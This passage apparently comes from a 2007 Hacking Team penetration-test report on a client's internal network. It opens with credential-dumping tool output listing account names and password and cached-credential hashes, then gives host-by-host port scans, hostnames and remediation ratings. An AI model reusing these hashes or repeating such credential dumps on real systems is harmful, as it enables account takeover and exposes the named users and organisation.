Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
MTSWriter:1003:19FB4918FC87D8B37A8136F95E7B19C9:A9DA2A499B194C6606F345744C318AAE
:::
Completed.
pwdump6 Version 1.6.0 by fizzgig and the mighty group at foofus.net
Copyright 2007 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
C:\TEMP>pwhist.exe
pwhist.exe
pwhist v0.96b, (C)2003 [email protected]
----------------------------------------
Administrator(current):500:de39d9281c64f167aa04c9cc30235cd8:6989028a536c2794cfc5
e88a6184904d:::
ASPNET(current):1002:85cc6687f04655e728b544d96fbacbf1:6fc1d44503f3553692a579d96f
b300a3:::
ASPNET(hist_01):1002:85cc6687f04655e728b544d96fbacbf1:6fc1d44503f3553692a579d96f
b300a3:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::
MTSWriter(current):1003:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
MTSWriter(hist_01):1003:19fb4918fc87d8b37a8136f95e7b19c9:a9da2a499b194c6606f3457
44c318aae:::
C:\TEMP>cachedump.exe
cachedump.exe
lredgwell_a:1EF8EACE0DF0F44656C240188ABC15AF:mtsgroup:
sbhular_a:E0C2CB361777F0238340A6994A7966DB:mtsgroup:
oclark:90D11C4DEE86048DD1E3229F190B2023:mtsgroup:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 251 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.11.3 192.168.210.112 [Unsafe]
Rating: unsafe
Vulnerabilities found: V9
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Recheck the Active Directory domain logon policies and trust relationships
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname JS0250
Compromised Not Compromised Directly Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
6.11.4 192.168.210.15 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 252 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Not detected
Hostname LONBG01
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-term-serv?
5000/tcp open upnp Microsoft Windows UPnP
5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port:
5900)
5900/tcp open vnc VNC (protocol 3.8)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.5 192.168.210.16 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 253 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname BLP-67E42204BAE LONBLOOMBERG
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.6 192.168.210.17 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname LONRU01
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service
5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port:
5900)
5900/tcp open vnc VNC (protocol 3.8)© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 254 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.7 192.168.210.23 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Embedded
Vendor/OS Not detected Version UPS Manifacturing
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive but no additional information could be extracted:
All 1697 scanned ports on 192.168.210.23 are filtered
Warning: OS detection for 192.168.210.23 will be MUCH less reliable because we
did not find at least 1 open and 1 closed TCP ports.
OS details: Apple Airport Express WAP v6.3, Applie Mac OS X 10.3.9 - 10.4.7,
Apple Mac OS X 10.4.8 (Tiger)
OS Fingerprint:
OS:SCAN(V=4.20%D=7/19%OT=%CT=%CU=%PV=Y%G=N%TM=469FD9EE%P=i686-pc-linux-gnu)
OS:U1(R=N)IE(R=Y%DFI=S%TG=40%TOSI=S%CD=S%SI=S%DLI=S)
6.11.8 192.168.210.110 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 255 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname PF0050
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
10000/tcp open backupexec Veritas Backup Exec 9.0
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.9 192.168.210.115 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname CS0063
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 256 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
135/tcp open mstask Microsoft mstask (task server -
c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.10 192.168.210.118 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname RECEPTION1-0386
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 257 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.11.11 192.168.210.121 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname RECEPTION4-0070
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1058/tcp open mstask Microsoft mstask (task server –
c:\winnt\system32\Mstask.exe)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.12 192.168.210.132 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 258 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname LONPLASMA0382
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.13 192.168.210.136 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname TT0248
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service
9535/tcp open man?
Network Distance: 1 hop© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 259 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.14 192.168.210.170 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname OC0374
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
5060/tcp open sip?
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.15 192.168.210.177 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 260 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname TD0435
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.16 192.168.210.179 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname LL0056
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 261 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.17 192.168.210.180 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname ZB0266
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 262 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.11.18 192.168.210.185 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname AK0399
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service
5101/tcp open admdog?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.19 192.168.210.193 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 263 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hostname 0060MARKET
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1068/tcp open mstask Microsoft mstask (task server -
c:\winnt\system32\Mstask.exe)
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.20 192.168.210.194 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname GP401
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 264 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.21 192.168.210.195 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname ZB0381 ZBOSTON
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1080/tcp open mstask Microsoft mstask (task server -
c:\winnt\system32\Mstask.exe)
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 265 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.11.22 192.168.210.196 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname EURO-MTS SBHULAR_A
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
111/tcp open rpcbind 2-3 (rpc #100000)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port:
5900)
5900/tcp open vnc VNC (protocol 3.8)
6502/tcp open msrpc Microsoft Windows RPC
38292/tcp open landesk-cba?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.23 192.168.210.197 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 266 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows 2000
Hostname SB0026 LON_PROXY
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
5800/tcp open vnc-http RealVNC 4.0 (Resolution 400x250; VNC TCP port: 5900)
5900/tcp open vnc VNC (protocol 3.8)
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.11.24 192.168.210.199 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname BT0247
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 267 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp open microsoft-rdp Microsoft Terminal Service
5060/tcp open sip?
9535/tcp open man?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
6.12 Workstations in Network 100.100.200.0/24
6.12.1 100.100.200.61 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS vendor patches, especially TCP/IP stack related ones
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP SP2 (NO FW)
Hostname HMAATUGH
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1043/tcp open boinc-client?
9535/tcp open man?
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 268 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.2 100.100.200.65 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS vendor patches, especially TCP/IP stack related ones
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP SP2 (NO
FW)
Hostname PSANTA
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This machine seems to have the built-in firewall disabled.
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 269 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.12.3 100.100.200.67 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP SP2 (NO
FW)
Hostname Not detected
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3389/tcp closed ms-term-serv
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This machine seems to have the built-in firewall disabled.
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.4 100.100.200.70 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 270 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Solution: Install all OS updates, especially TCP/IP stack related ones
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP SP2 (NO
FW)
Hostname Not detected
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
80/tcp open http Apache httpd 2.2.4 ((Win32) PHP/5.2.1 mod_perl/2.0.3
Perl/v5.8.8)
OS fingerprint not ideal because: Missing a closed TCP port so results
incomplete
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
This machine seems to have the built-in firewall disabled.
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.5 100.100.200.77 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP SP2 (NO
FW)
Hostname APASSONI
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 271 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This machine seems to have the built-in firewall disabled.
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.6 100.100.200.79 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones
Discovery method Missed Initial scan, ICMP Echo Ping on Second scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Windows XP
Hostname MBIAZZO
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
80/tcp open http?
139/tcp open netbios-ssn
443/tcp open https?
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 272 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
9535/tcp open man?
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This machine seems to have the built-in firewall disabled.
TCP Sequence number generation seems to be extremely weak allowing MITM attacks.
6.12.7 100.100.200.91 [Unsafe]
Rating: unsafe
Vulnerabilities found: V4
Risk state: Medium
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates, especially TCP/IP stack related ones
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Workstation
Vendor/OS Microsoft Windows Version Not detected
Hostname MSAVOIA
Compromi
sed
No Info None
Auth Not detected
